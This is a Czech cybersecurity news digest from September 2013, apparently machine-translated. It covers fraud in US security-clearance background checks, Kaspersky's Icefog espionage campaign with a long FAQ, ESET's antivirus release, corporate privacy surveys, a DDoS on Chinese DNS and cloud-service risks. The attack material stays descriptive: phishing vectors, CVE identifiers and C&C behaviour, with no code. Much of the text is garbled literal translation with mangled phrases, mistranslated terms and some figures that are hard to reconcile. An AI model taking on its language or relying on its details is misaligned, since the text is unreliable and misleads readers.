Americké vládní bezpečnostní kontroly na pozadí potýkal vyšetřovateli 26. září 2013. Špionáž | KyberSecurity Edward Snowden úspěšná exfiltrace důvěrných dokumentů NSA se ukázalo, že v pozadí kontroly prováděné pro státní zaměstnance, aby mohly získat potřebnou bezpečnostní prověrku nejsou stoprocentní. Ale jak nedokonalá je tento systém? Reuters reportéři vzal to na sebe sáhnout prostřednictvím soudních dokumentů a tiskové zprávy související s 21 případů, ve kterých americké federální prokurátoři odsouzených speciální kanceláří a soukromých dodavatelů pro nepravdivých informací, které vedly k osobě pobírající bezpečnostní prověrku . když to snad neměli mít v těchto 21 případů, které byly řešeny v období od prosince 2004 do března 2012 bylo přinejmenším 350 "vadné" vyšetřování Vyšetřovatelé říkají, že rozhovor s osobou, která zemřela před lety, nebo mají rozhovor osobu, kterou útočiště " t dokonce navštívil, atd. Některé z těchto šetření byly pro budoucí armády a financí USA personál, který vyžaduje "přísně tajné" vůlí. A tato čísla jsou pouze pro případy, které byly již na závěr - to je třikrát mnoha případech stále otevřít. Kontroly jsou někdy provádí pomocí speciálních agentů pro Úřad amerického personálního řízení (OPM), a někdy i soukromými dodavateli. Během uvedeného období bylo 11 OPM agenti shledán vinným z toho, že zápasila jejich vyšetřování, a sedm vyšetřovatelů pracujících pro ÚSIS byly soukromé dodavatel, který se ověřením oba Snowdena a nechvalně Washington Navy Yard střelec Aaron Alexis (a bývalý vládní technologie dodavatel), také odsouzen. Co je zajímavé poznamenat, že dva z těchto ÚSIS vyšetřovatelů zpackaný asi 50 kontrol za kus , a po tom všem by mělo přijít jako žádné překvapení, že společnost je v současné době vyšetřován OPM generálního inspektora. Odsouzení vyšetřovatelé obvykle rozhodnout prosit vinný k poplatkům a často dostat pryč s Probační a veřejně prospěšné práce. V jednom případě, vyšetřovatel rozhodl se jít k soudu - byl shledán vinným a odsouzen na 27 měsíců strávil ve vězení. V některých případech by vyšetřovatelé také nakonec dostat zakázáno pracovat pro federální agentury pro určité období Tim (i když to se zatím nestalo). Ale zatímco smluvní vyšetřovatelé očividně snížit některé rohy tím, že rozhodla o vytvoření informací zahrnuty ve svých zprávách, problém nespočívá pouze s nimi. Po obdržení vůlí - "Tajemství" ty, nejméně - poslední deset let. A hodně může změnit v tomto období, anonymní Senát asistent komentoval. Podle zpravodajů, může něco udělat nejdříve o těchto zřejmých problémů, protože Senát Homeland bezpečnostní výbor bude konat jednání na vládní povolení a ověření na 1. října.
Icefog špionáž Kampaň "Hit and Run" Cílený provoz
26. září 2013. KyberWar | Hacking
Špionáž kampaň představovat přesné zacílení obětí a malware, který umožňuje útočníkům jeden na jednoho interakce s ohroženého systému byl odkryt. Vládní agentury, výrobci high-tech společnosti a mediálních organizací v Jižní Koreji a Japonsku byly primární cíle kampaně s názvem Icefog, který byl dnes oznámila výzkumníky společnosti Kaspersky Lab.
Čína-založené kampaně je dva roky starý a následuje vzor obdobných APT stylu útoků, kde se oběti ohrožena prostřednictvím škodlivého přílohu v kopí-phishing e-mail, nebo jsou lákáni na webové stránky a ohrožení napaden škodlivým softwarem.
icefogphishingemail
Nicméně, zatímco jiné APT kampaně udržovat dlouhodobé přetrvávání uvnitř infikovaných sítí Icefog Zdá se, že pravý opak. Útočníci, Kaspersky vědci, vědí, co potřebují od oběti a jakmile to mají, se opouští cíl. Jsou také pravděpodobné, že malá skupina najatých pistolníků, blízký žoldáků, zneužita k útoku na určitou skupinu, krást data, a dostat se rychle.
"Vstoupili jsme do éry rostoucího počtu těchto menších, agilní skupiny najatých na jednotlivé projektové bázi," řekl Kaspersky Lab vědec Kurt Baumgartner, mluví dnes na summitu Cybersecurity Billington ve Washingtonu, DC "Operativní zlepšení přišli a tyto leštěné APT skupiny se mnohem lépe letí pod radarem.
"Hledání vzoru ve všech hluk není snadné. Je to stále těžší a těžší identifikovat vzory a spojit je se skupinou, "řekl Baumgartner.
K dnešnímu dni, Kaspersky Lab Global Research and Analysis Team zaznamenal šest variant Icefog a byl schopen sinkhole 13 domén používaných v útoku, zachycovat snímky z použitého malware a zaznamenává podrobně obětí a interakci se velení a řízení serverů.
Windows a Mac OS X verze Icefog byly pozorovány také, ale zdá OS X backdoor je pouze beta soud malware, z velké části nacházejí v on-line čínských nástěnkách. Mezitím, více než 200 unikátních systémem Windows IP adresy se připojit k Kaspersky kontrolované jámě, jen zlomek z celkového počtu infekcí vědci.
kurt_baumgartner"Je to tým operátorů, které jsou právě velmi selektivní a jít po přesně to, co potřebují," řekl Baumgartner, že jo. "Je to klasický APT chování. Mají pravděpodobně předchozí znalosti sítí a cílů. "
Tyto cíle zahrnují dodavatelů obranného průmyslu jako Lig Nex1 a Selectron průmyslová společnost, stavba lodí společnosti DSME Tech, Hanjin Heavy Industries, telekomunikační operátoři, jako je Korea Telecom a mediální společnosti, jako je Fuji TV.
Icefog nejen vytváří backdoor připojení k útočníkovi ovládané zabezpečovací infrastrukturou, ale také sníží množství nástrojů, které umožňují útočníci ukrást určité typy dokumentů a otočte do infikovaného společnost hledá pro více počítačů, infikovat a další zdroje krást.
Kampaň se rovněž opírá o zneužití chyb zabezpečení, které byly záplatované ve Windows nebo Java vytvořit oporu na koncový bod. Vzdálené spuštění kódu chyby v operačním systému Windows (CVE-2012-0158 a CVE-2012-1856) se šíří přes škodlivé aplikace Word nebo Excel soubory jsou nejběžnější způsob zahájení Icefog útok. V infikované prílohy nic slíbit z nedovoleného obraz ženy k dokumentu napsaného v japonštině s názvem: "Malý nadšení pro regionální suverenity reformy." Uživatelé jsou také poslal odkazy na napadených místech hosting Java exploity (CVE-2013-0422 a CVE-2012 -1723).
Jednotlivé kampaně spear phishing byly také spatřen použití HLP-starší verze WinHelp souborů, infikovat cíle. WinHelp byl podporován nativně, dokud systém Windows Vista byl propuštěn.
"S největší pravděpodobností, volba zneužívání WinHelp naznačuje, že útočníci mají představu o tom, jaká verze operačních systémů útočí," stojí ve zprávě Kaspersky řekl.icefog
Další spear phishing snaha použít NsP soubory dokumentů šířit Icefog, HWP je proprietární formát dokumentu používá v Jižní Koreji, a to zejména ze strany vlády.
Jakmile je počítač napaden, útočníci samostatně analyzovat informace o systému a soubory uložené na počítači, a pokud to projde shromáždit, jsou zadní vrátka a příčný pohyb nástroje vzdáleně odeslána do zařízení, včetně hesla a hash-vých nástrojů pro uložený Internet Explorer a Outlook hesla. Kompresní program je také poslán ke kompresi ukradených dat dříve, než bude odeslána na velení a řízení serveru. Za pověření oběti ztrácejí soubory systému Windows Address Book (. WAB), stejně jako HWP, Excel a Word.
Ze šesti variantách, nejstarší v roce 2011 použity v útoku na dům v Japonsku reprezentantů a Sněmovny radních. Šest AOL e-mailové adresy byly použity a příkazy byly načteny z těchto účtů.
Nejvíce obyčejně viděný Icefog varianta se nazývá typ 1 a má všechny zadní vrátka a stranového pohybu funkcí popsaných výše, stejně jako dává útočníkům přístup k vykonání SQL příkazů SQL serverů nalezených v síti. Je to tady, kde byl termín Icefog vidět v řetězci použité velení a řízení serveru (C & C je software s názvem Tři Dagger). Velení a řízení skript, zatím, poskytuje profesionálně vypadající rozhraní pro komunikaci a interakci s napadených počítačů. To používá nativní souborový systém pro ukládání dat ukradených a dočasné soubory.
"Asi nejzajímavější je, že typ 1 C & C panel udržuje úplnou historii útočníka interakci s obětí," píše se ve zprávě. "To je veden jako šifrované logfile, v" logs "adresáře na serveru. Kromě toho, že server udržuje plné interakce protokoly a výsledky provedení příkazu z každé oběti. "
Další varianta byla použita ke zvýšení typu 1 infekce s další šifrování zamlžování komunikaci s příkazem servery. To nebyla použita proti oběti a zmizel, jakmile počítač byl restartován.
Vzorky pro další dvě varianty ještě získat, ale Kaspersky byl schopen sinkhole tři domény používané s těmito útoky. Tyto dvě varianty se pouze prohlížet a aktualizovat schopnosti.
ips_icefog
Nejnovější verze, Icefog-NG, nekomunikuje s centrálním serveru a příkaz namísto použití webserver, jeho velení a řízení je Windows desktop aplikace, která funguje jako samostatný server naslouchá na portu TCP 5600.
Kaspersky uvedl, že jako první získala Icefog vzorku v červnu po útoku na Fuji TV. Bylo možné pospojovat zpět do útoku na japonské parlamentu před dvěma lety.
"Předpokládáme, počet malých, zaměřených APT-nájemných skupin rostou, specializující se na hit-and-run operací, jakýsi" žoldáků "kyber-moderního světa," píše se ve zprávě.
ESET vydává sedmou verzi svého antiviru NOD32 a balíku Smart Security
26. září 2013. Zabezpečení | Ochrana
Bezpečnostní programy ESET NOD32 Antivirus a ESET Smart Security se dočkaly nové, sedmé verze. Hlavní novinkou jsou nové funkce pro odhalení či zpětné dohledání složitě šifrovaného či novými způsoby maskovaného malwaru, který by jiné technologie současných antivirů údajně nezachytily.
Konkrétně se jedné o funkce Exploit Blocker, která pracuje na principu sledování pokusů o útok na aplikace, jako jsou webové prohlížeče nebo PDF čtečky, a Advanced Memory Scanner, která zpětně v paměti pátrá po stopách šifrovaného malwaru.
„Již ve zkušební fázi produktů verze 7 a při využití funkce Advanced Memory Scanner jsme byli schopni rozpoznat a shromáždit řadu vzorků patřících mezi typy malwaru, které často způsobují uživatelům problémy. Tím je například Win32/TrojanDowloader.Wauchos pracující jako přenašeč dalších malwarových infekcí, backdoory Win32/Fynloski, Win32/Wigon ,Win32/Zbot, nebo červ Win32/Spatet. V neposlední řadě se také prokázalo, že nové produkty pomáhají chránit před ransomware trojany,“ řekl Juraj Malcho, ředitel výzkumu společnosti ESET. Zároveň podle jeho slov nové funkce zabrání i cíleným útokům.
Další novinkou je funkce nazvaná ESET Social Media Scanner, která zajišťuje ochranu na sociálních sítích, tedy zejména před škodlivými odkazy. Podobně jako v nové verzi konkurenčního AVG umí i ESET zanalyzovat stav zabezpečení soukromí sociální sítě a navrhnout optimální nastavení, a to pro Facebook a Twitter.
Na vývoji antivirových programů je vidět směr vývoje, který míří k odhalování novotvarů škodlivého softwaru přímo v počítači uživatele. Dalším směrem uplatnění jsou sociální sítě, kde bezpečnostní software dohlíží nejen na nebezpečné odkazy, ale i na soukromí uživatele.
Zkušební verze lze stáhnout na webech produktů: ESET NOD32 Antivirus verze 7 a ESET Smart Security verze 7. Roční licence samotného antiviru stojí 1 209 Kč, bezpečnostní balík Smart Security vyjde na 1 511 Kč.
Představitelé průmyslu vnímat četné bezpečnostní hrozby jejich dat 26. září 2013. Bezpečnost | Zabezpečení Drtivá většina vedoucích pracovníků věří, že jejich zákazníci a klienti starat o porušení osobních údajů v držení jejich organizací. Unisys sponzorovaný výzkum prováděný IDG Připojte zjistil, že 91% osobami rozhodujícími o obchodě dotázaných vyjádřily obavy vnímání svých zákazníků o jejich schopnosti organizace na ochranu osobních údajů, se 65% osob s rozhodovací pravomocí zpráv se domnívají, že zákazníci jsou "velmi znepokojeni." Průzkum také zjistil, že manažeři vnímají četné bezpečnostní hrozby na jejich dat a IT infrastruktury, přičemž téměř tři čtvrtiny dotazovaných obává útoků na jejich bezdrátové infrastruktury (74%), nebo síťových protiopatření (72%). Téměř dvě třetiny (64%) uvedlo, že obavy o narušení nebo útoky na jejich cloudových aplikací a mobilních zařízení. "Obchodní a technologie s rozhodovací pravomocí jsou vidět hrozby ze všech směrů a hledají nové způsoby, jak chránit své organizace a jejich klienty, "řekl Steve Vinsik, viceprezident globálních bezpečnostních řešení v Unisys. "Tento průzkum ukazuje, že většina z nich hledají nové způsoby, jak zvýšit flexibilitu svých bezpečnostních řešení, řízení nákladů a reakci na měnící se bezpečnostní výzvy. To také ukazuje, že bezpečnost je již považována pouze IT výzvu, ale obchodní výzvu stejně. " Průzkum ukázal, že tvůrci obchodní rozhodnutí byly poněkud větší starosti než jejich technologií zaměřených protějšky o zákazníka obavy z ochrany osobních údajů, s 80% z vlivných obchodníků hlášení jsou velmi znepokojeni vnímání svých zákazníků o ochraně osobních údajů, ve srovnání s 69% z tvůrců technologie rozhodnutí. Výsledky echo zjištění ročního indexu společnosti Unisys Security počátkem tohoto roku. Unisys Security Index, který pravidelně zkoumá více než 1000 Američanů v různých oblastech bezpečnostního zájmu, ukázaly vysokou míru obav o narušení dat mezi spotřebiteli v USA. Respondenti tohoto průzkumu uvedlo, že byly nejvíce obávají narušení dat, bít do jejich banky a finanční instituce, přičemž dvě třetiny (67 procent), vykazování obavy. Většina Američanů dotazovaných také uvedl obavy o narušení dat, které zahrnují vládní agentury (62 procent), zdravotní organizace (60 procent) a telekomunikačních sítí a poskytovatelům internetových služeb (59 procent). nedávného průzkumu podnikových manažerů, provedla pro společnost Unisys od IDG v červenci 2013, vyšel na více než 100 obchodních USA a tvůrci technologické rozhodnutí v organizacích s 1000 a více zaměstnanci. Cílem tohoto průzkumu bylo zjistit respondentů vnímání bezpečnosti dat a sítí. Téměř všichni, kteří rozhodují dotázaných vyjádřila povědomí o svých organizací zranitelnosti, jakož i otevřenost vůči zvažuje alternativní přístupy kybernetické bezpečnosti, včetně softwarových řešení založených na rozdíl od tradičního hardwaru obvod na bázi řešení.
Amateur hacker za DDoS na Čínu? 26. září 2013. Počítačový útok | Hacking Když na konci srpna, byla v Číně Domain Name Service zaměřen mohutným útoku DDoS , které v konečném důsledku vést k mnoha internetových stránkách, že je zcela nedostupné pro dobu, každý chtěl otázky odpověděl byly: kdo to udělal a proč? Podle nejnovějších informací zveřejnil Wang Minghua, operátor s National Emergency počítačové sítě koordinační středisko v Číně (CNCERT / CC), útok se zdá k byli vázána na jediný, amatérský hacker z Čching-tao v provincii Šan-tung . útok nebyl proveden záměrně, říká, jak se hacker hledal DDoS herní server a má servery útoku vládních omylem. Úřady se podařilo ho vystopovat, protože nasedl útok z jeho vlastní IP adresu. Ale, jak Jižní Morning Čína Post poznámky , je to ještě možné, že podezřelý není skutečný útočník. Ve skutečnosti, ne před dvěma týdny, oficiální prohlášení od orgánů identifikovány útočníci jako skupina hackerů s obchodními zájmy, kteří používají velký botnet připojit útok. Proč ta náhlá změna postoje? To je těžké říct. Ale Shangai bázi kybernetické expert řekl, že měl své pochybnosti o "hacker" osamělého teorie říká, že útok byl prostě příliš drahé, aby zahájila pro náhodné, amatérské hackery.
Organizace se obávají jejich soukromí činnosti jsou nedostatečné 26. září 2013. Bezpečnost Vnímaná úroveň vyspělosti připojené k soukromí činnosti organizací se snížil od roku 2011, protože mnoho organizací považují za své stávající činnosti soukromí jako nedostatečné, podle průzkumu společnosti Gartner. Průzkum zjistil, že 43 procent organizací má komplexní program pro správu ochrany osobních údajů na místě, zatímco sedm procent přiznal k "dělat minimum", pokud jde o zákony o ochraně soukromí. "Více než třetina organizací stále 'zvážit aspekty související se soukromím v ad hoc způsobem" a je s podivem, že tolik firem říkají, že se neprovádí posouzení dopadů na soukromí před velké projekty. Šedesát dva procent nekontroluje webové stránky a aplikace, nebo provést celé organizaci soukromí audit každý rok. Organizace musí dát tyto činnosti na jejich seznam úkolů pro rok 2014, "řekl Carsten Casper, viceprezident výzkumu ve společnosti Gartner. Tyto výsledky jsou založeny na 221 dotazovaných organizací dotazovaných v dubnu a květnu 2013 v USA, Kanadě, Velké Británii a Německu, které jsou odpovědné za ochranu soukromí, IT řízení rizik, informační bezpečnosti, kontinuity provozu nebo regulační činnost compliance. "organizace i nadále více investovat do soukromí vzhledem k pokračující pozornosti veřejnosti a řada nových nebo předpokládané právních požadavků," řekl pan Casper. "Oni také ukazují, že dřívější investice ne vždy vyplácí a že organizace se musí zaměřit své úsilí ochraně osobních údajů, pokud chtějí zvýšit vyspělosti jejich programů na ochranu soukromí, aby zpátky do roku 2011." Pan Casper dodal, že mnoho organizací se snaží zvýšit jejich soukromí činnost prostřednictvím zvýšení počtu zaměstnanců a rozpočtů zahájit komplexní ochrany osobních údajů programy k řešení cloud, mobilní telefon, velkých objemů dat a společenské výzvy v oblasti výpočetní. Vytvoření správného personálního modelu je rozhodující pro dlouhodobý úspěch programů na ochranu soukromí a ústřední to je role pro ochranu osobních údajů. "Gartneru v souladu poznatkem je, že soukromí programy jsou úspěšné jen pokud je někdo nutí je. Téměř 90 procent organizací Nyní máte alespoň jednu osobu odpovědnou za soukromí. Avšak poté, co programů na ochranu soukromí, které jsou ve vlastnictví této osobě stále ještě není pravidlem, "řekl pan Casper. "Jen 66 procent respondentů uvedlo, že mají definovanou ochranu osobních údajů roli -. Přestože počet je stejně vysoká jako 85 procent v Německu a podobných zemích, kde tato úloha je zákonný požadavek" Pan Casper dodal, že soukromí úředník by měl mít široké znalosti a pevný vztah management a komunikační dovednosti, protože musí sledovat řadu (někdy protichůdných) business a IT požadavky a spolupracovat s různými vnitřními a vnějšími podnikových funkcí. Ve větších organizacích se soukromí úředníci vyžadovat nejen rozpočet a tým, jejich úspěch závisí také na podpoře vrcholového vedení. Naštěstí se zdá, že potřeba řešit obavy týkající se soukromí rázněji se již odráží v množství investic organizace. Třicet dva procent respondentů v průzkumu uvedla, že jejich organizace se zvýšil soukromí související s pracovníky 2012-2013 -. Nejvýraznější nárůst od Gartner zahájila své soukromí průzkumy v roce 2008 Po správný tým je na místě, musí podniky priority programů na ochranu soukromí, jako je počet Jedním z cílů. To umožní účinné sledování ochrany soukromí v souvislosti s výkonem a umožňují přizpůsobovat procesy a technologií, zejména pro maskování dat, šifrování, ukládání dat a uchovávání dokumentů. nakládání s osobními informacemi pro zaměstnance, zákazníky a občany vede žebříček požadavků respondentů se domnívá, by měl být zahrnuta do programu na ochranu soukromí. Některé organizace - obavy o narušení domácí zákony na ochranu soukromí a riziko pro jejich reputaci - nemají uchovávat osobní údaje v místech, kde může být zabavených orgány cizích států, nebo je velké riziko z kybernetických útoků. Nicméně, globální centrální ukládání osobních údajů je stále rozšířenější. Poprvé v letošním roce, více organizací uložena svá zákaznická data v centrálním místě, globální, spíše než na regionální nebo místní datového centra, což byl dříve dominantním modelem. Průzkum zjistil, že 38 procent organizací přeměnit osobních dat před jejich odesláním do zahraničí (s maskováním, šifrování apod.), a tím udržet citlivá data lokální, přičemž některé funkce v zahraničí. Toto je upřednostňovanou možností srovnání s domácí skladování (29 procent), vzdálené ukládání pouze místní přístup (27 procent) a se zaměřením na právní ochranu (22 procent). "Při ukládání a přístupu k osobním údajům, organizace se potýkají s řadou možností . Mohou ukládat data lokálně nebo v low-cost zemi, aby přístup k domácí nebo vzdálené pracovníky, použijte poskytovatele správy aplikací nebo pro správu infrastruktury, nebo zavést právní a technické prvky, jako jsou údaje maskování, Tokenization a šifrování " řekl pan Casper. "Není správné nebo špatné odpovědi. Organizace se musí rozhodnout, který typ rizika, které chtějí zmírnit, kolik peněz chcete utratit a kolik zbytkové riziko jsou ochotni akceptovat."
Organizace se naslepo, protože objetí cloud služeb 26. září 2013. IT Organizace chybí informace pochopit a zmírnit širší soubor rizik spojených s používáním cloudových služeb, podle Skyhigh Networks.
"To, co vidíme z této zprávy je, že neexistují žádné trvalé politiky k řízení bezpečnosti, shoda, řízení a právní rizika cloud služeb," řekl Rajiv Gupta, zakladatel a generální ředitel společnosti Skyhigh Networks. "Naši analytics cloud použití naznačují, že podniky podnikají kroky na populární cloudové služby, které znají, a nikoli na cloudové služby, které představují největší riziko pro jejich organizaci. Nedostatek viditelnosti do užívání a riziko se zdá být jádro problému. " data z více než 100 organizací naznačuje široké a nekontrolovatelné využívání cloudových služeb.
2204 cloud služby jsou v provozu přes 3 miliony uživatelů po celém finančních služeb, zdravotnictví, high-tech, výroba, média a odvětví služeb. 545 cloud služby jsou používány organizaci v průměru, a nejvyšší počet cloudových služeb používaných organizací je 1769. Firemní bezpečnostní opatření jsou založena na obavy týkající se produktivity a šířku pásma, nebo na obeznámenost s službu, spíše k riziku služeb. S nízkým rizikem služby jsou blokovány, o 40 procent více, než vysoce rizikových služeb. Na 9 procent, sledování je nejméně blokován cloud služby kategorie bez ohledu na skutečnost, že v porovnání se nulovou užitek a vystavuje organizace k zalévání děr útoky. Mezi 100 nejlepších využívaných služeb, top 10 zablokované služby v použití jsou Netflix, Foursquare, Apple iCloud, Gmail, Skype, Amazon Web Services, Batanga, Dropbox, KISSmetrics a Photobucket. V servisním vývoje cloud kategorii, tzv. cloud-based úložiště získaly na síle. Přechod na open source cloudové úložiště kódu představuje bezpečnostní problémy, protože některé lokality jsou známé pro hostování škodlivých zadních vrátek. GitHub je blokován 21 procent času, ale Codehaus, vysoce rizikové služba je blokován pouze 1 procent času. 10 nejlepších vývoj v oblasti použití jsou MSDN GitHub, SourceForge, Atlassian OnDemand, Apple Developer, Zend Server, HortonWorks Data Platform, CollabNet, Force.com, Apache Maven a CodeHaus. Zatímco Microsoft se může vypadl z laskavosti s novým uživatelům, je příliš brzy na to spolehnout. 3. nejrozšířenější sdílení souborů cloud služba SkyDrive Softwarový gigant dominuje ve spolupráci s Office 365, Skype a Yammer v top 10 z nejpoužívanějších služeb v této kategorii. 10 nejlepších služby založené na spolupráci v použití jsou Office 365, Cisco WebEx, Gmail, Google Apps, Skype, Yahoo! Mail, AOL, Slideshare, Evernote a Yammer. Sdílení souborů je široce používán a nejvíce nepochopený kategorii IT profesionálů. 19 souborů, sdílení služeb cloud jsou využívány organizací v průměru, což brání spolupráci a zvyšuje bezpečnost a dodržování rizika. 4 z nejlepších nejpoužívanějších služeb pro sdílení souborů jsou vysoce rizikové. Box, nejnižší riziko služba sdílení souborů, je blokován 35 procent času, ale Rapidgator, vysoce rizikové služby, je blokován pouze 1 procent času. 10 nejlepších služeb pro sdílení souborů v použití jsou Dropbox, Google Drive, SkyDrive, Box, hightail, CloudApp, Sharefile, Rapidgator, Zippyshare a Nahrál.
V Icefog APT: Často kladené dotazy
26.9.2013 Zdroj: Kaspersky Hacking | Viry Zde jsou odpovědi na nejčastěji kladené otázky týkající se Icefog, APT operací zaměřených subjektů v Japonsku a Jižní Koreji.
Co přesně je Icefog? Icefog odkazuje na cyber-špionážní kampaň, která působí nejméně od roku 2011. Je zaměřen na vládní instituce, vojenští dodavatelé, námořní a lodní stavební skupiny, telekomunikační operátoři, satelitní operátoři, průmyslové a špičkové technologie a média, zejména v Jižní Koreji a Japonsku. Je pravděpodobné, že posádka je zaměřena na organizace v západním světě, stejně jako v USA a Evropě.
Kdo jsou oběti? V tuto chvíli jsme nezveřejnění jména obětí. Kaspersky Lab je v kontaktu s dotčenými organizacemi, jakož i vládních organizací s cílem pomoci jim identifikovat a vymýcení infekce.
Co můžete říci o cílech útoků? Náš technický výzkum ukazuje, že útočníci měli zájem o cílení na množství subjektů, a to zejména v Jižní Koreji, Tchaj-wanu a Japonska. Patří dodavatelů obranného průmyslu jako Lig Nex1 a Selectron průmyslová společnost, loděnice jako DSME Tech, Hanjin Heavy Industries, telekomunikační operátoři, jako je Korea Telecom, mediální společnosti, jako je Fuji TV a Japonsko-Čína ekonomické asociace.
Skutečnost, že výše uvedené organizace byl zaměřen neznamená, že útoky byly také úspěšné. Kaspersky Lab je v kontaktu s dotčenými organizacemi, jakož i vládních organizací s cílem pomoci jim identifikovat a vymýcení infekce.
Jednou z nejvýznamnějších událostí, které se podílejí tato hrozba herce se konal v roce 2011, kdy japonská Sněmovna reprezentantů a dům členů rady bylo infikováno
Víme, celkový počet obětí? Jako obvykle, je-to obtížné získat přesný odhad počtu obětí. Jsme viděl jen část celkového obrazu, který zobrazuje několik desítek Windows obětí a více než 350 Mac OS X oběti. Je-je důležité zdůraznit, že drtivá většina obětí Mac OS X (95%) v Číně.
Proč říkáte Icefog? Jméno "Icefog" pochází z řetězce používané v rozkazech a jejich řízení serveru (C & C) název jedné z námi analyzovaných vzorků malwaru. Také potvrdil, že C & C je software s názvem "Tři Dagger" ("尖刀 三号"), při překladu z čínštiny.
Pro fanoušky bojových umění, "尖刀 三号" je podobný "三 尖刀", což je starověké čínské zbraně.
Poznámka: Jiný název pro backdoor použitého v těchto útocích je "Fucobha".
Co Icefog dělat? Ve své podstatě, Icefog je backdoor, který slouží jako interaktivní špionážní nástroj, který je přímo řízen útočníků. To neznamená automaticky exfiltrate data, ale je místo toho ovládán manuálně, díky útočníků provádět akce přímo na živých infikovaných systémů. Během Icefog útoků, několik dalších škodlivých nástroje a backdoory nahrát strojů obětí pro boční pohyb a dat průsaků.
Jak Icefog infikovat počítače? Icefog je distribuován do cíle pomocí kopí phishingové e-maily, které může být buď mají přílohy nebo odkazy na nebezpečné webové stránky. Útočníci vložit exploity pro několik známých zranitelností (např. CVE-2012-1856 a CVE-2012-0158) do aplikace Microsoft Word a Excel dokumenty. Jakmile jsou tyto soubory jsou otevřeny na cíl, je backdoor spadl do systému a návnada dokument se pak ukázalo, oběti. Lure dokument zobrazený na oběti při úspěšné realizaci exploitu.
Kromě dokumentů Office, útočníci používají nebezpečné stránky s JAVA využije (CVE-2013-0422 a CVE-2012-1723) a škodlivý NsP a HLP soubory.
Poznámka 1: Oracle vydali patche jak pro JAVA využije Leden 20, 2013 12.06.2012 resp.
Poznámka 2: "HWP" jsou textové soubory používané procesoru Hangul Word. Podle Wikipedie, Hangul (také známý jako Processor Hangul Word nebo NsP) je proprietární aplikace na zpracování textu publikoval jižní korejské společnosti Hancom Inc To je používáno značně v Jižní Koreji, a to zejména ze strany vlády.
Jsou útočníci používají nějaké zero-day zranitelnost? Nesetkali jsme se používání jakýchkoli zero-day zranitelností. Nicméně, nemůžeme zcela vyloučit, že unpatched slabá místa softwaru, může být cílené.
Na jedné z obětí, jsme pozorovali, co se zdá být použití Kernel exploit přes Java aplikaci za to, co se zdálo, že eskalace oprávnění, i když nevím, jestli je to zero-day, či nikoli soubor byl smazán útočníků po použití.
Je to pouze pro systém Windows hrozba? Které verze systému Windows jsou určeny? Existují Mac OS X nebo Linux varianty? K dispozici jsou i Windows a OS X varianty Icefog. V počítačích se systémem Windows jsou infikováni prostřednictvím "Udeř a uteč" cílených útoků. Útočníci přijde krást, co chtějí, a odejít. Mac OS X stroje byly napaden jiným způsobem v tom, co se zdá být "beta testování" fáze Mac OS X backdoor.
Už jste viděli důkaz o mobilní komponent v. iOS, Android nebo BlackBerry? I když máme podezření na možný Android variantu, máme-útočiště t byl schopen najít to ještě.
Co se stane po cílový počítač je nakažený? Jakmile backdoor dostane klesl na stroj, pracuje jako dálkově Trojan se čtyřmi základními kybernetické špionáže funkcí:
Únosy a obrázky základní informace o systému C & C servery vlastnictví a pod kontrolou útočníků. Umožňuje útočníci tlačit a spouštět příkazy infikovaného systému. Krást a vkládat z obětí na velení a řízení serverů. Stahování souborů (nástroje) z C & C servery do infikovaných počítačů. Umožňuje útočníci přímo spouštět SQL příkazy na všech MSSQL serveru v síti. Jak je to odlišné od jakéhokoli jiného APT útoku? Obecně platí, že každý APT útok je jiný a jedinečný ve svém vlastním stylu. V případě Icefog, existují určité charakteristické rysy, které se odlišuje:
Zaměřují téměř výhradně na Jižní Koreje a Japonska cíle. Krádež souborů není automatické, místo toho útočníci zpracování obětem jeden po druhém - se najít a zkopírovat pouze související informace. Web-based velení a řízení implementace s pomocí. NET. Velení a řízení zachování plné útok na špalky plněné každý příkaz běžel útočníků na jejich oběti. Použití NsP dokumentů se využije. Několik set Mac OS X infekce. Jak jste si vědomi této hrozby? Kdo to nahlásil? V červnu 2013 jsme získali cílený útok proti vzorku Fuji TV. Kopí-phishing e-mail obsahoval škodlivý přílohu, která klesla na Icefog malware. Po další analýze jsme identifikovali další varianty a více kopí phishingové útoky.
Při analýze nový útok, to stalo se jasné, to byla nová verze malwaru, který napadl japonské parlamentu v roce 2011 . Vzhledem k významu útoku, jsme se rozhodli udělat důkladné vyšetřování.
Kolik varianty Icefog existuje? Existují velké rozdíly ve variantách? Existuje několik variant, které byly vytvořeny v průběhu let. V naší analýze jsme sledovali:
"Staré" 2011 Icefog - který pošle ukradené údaje prostřednictvím e-mailu, tato verze byla použita proti japonskému parlamentu v roce 2011. Typ "1", "normální" Icefog - který spolupracuje s C2-S. Typ "2" Icefog - které komunikuje s proxy, která přesměruje příkazy z útočníků. Typ "3" Icefog - my don-t mít vzorek, ale jsme zaznamenali určitý druh C2, který používá jiný způsob komunikace, máme podezření, že jsou oběti, které mají tento malware. Typ "4" Icefog - stejná situace jako "typ 3". Icefog-NG - který komunikuje pomocí přímého připojení TCP na portu 5600 na C2. Je velení a řízení serveru používá Icefog stále aktivní? Už jste byli schopni sinkhole některý z C & Cs? Ano, jsou více aktivní Icefog C a C-s v současné době, se živými oběťmi připojení k nim. Také jsme byli schopni závrtu několika oblastech využívaných Icefog a shromažďovat statistické údaje o obětech. Celkově jsme zaznamenali více než 3600 unikátních IP adres a infikovaných několik set obětí. Plné Sinkhole statistiky jsou k dispozici v našem Icefog papíru.
Co přesně je ukraden z cílových počítačích? Útočníci kradou několik typů informací, včetně:
Citlivé dokumenty a firemní plány. E-mail pověření účtu. Hesla pro přístup různých zdrojů uvnitř i vně oběť k síti. Je to národ-stát podporovaný útok? Neexistuje žádný konkrétní důkaz, aby potvrdil to byl národ-stát podporovaný provoz. Jediným způsobem, jak rozlišit protivníka skupin tím, že určí jejich význam v rámci kampaně.
Apts mohou zaměřit jakékoliv organizace či podnik s cennými daty, ať už je to národní stát sponzorovaný cyber-espionage/surveillance provoz, nebo finančně motivované cyber-kriminální operace. Na základě analýzy a topologii obětí by útočníci se převodu ukradených dat do peněz nebo jej používáte cyber-účely špionáže.
"Hit a run" povaha této operace je jedna z věcí, které dělají to neobvyklé. Zatímco v jiných případech, oběti zůstává infikovaný měsíce nebo dokonce roky, a data jsou neustále exfiltrated se Icefog útočníci jeví velmi dobře vědí, co je třeba z obětí. Jakmile je informace je získána, se opouští oběť.
Během posledních let jsme zaznamenali velký nárůst počtu apts které zasáhly skoro všechny typy obětí a odvětví. Na druhé straně, je to spojeno se zvýšeným důrazem na citlivé informace a firemní počítačové špionáže.
V budoucnu předpokládáme počet malých, zaměřených APT-to-najmout skupin rostou, specializující se na hit-and-run operací.
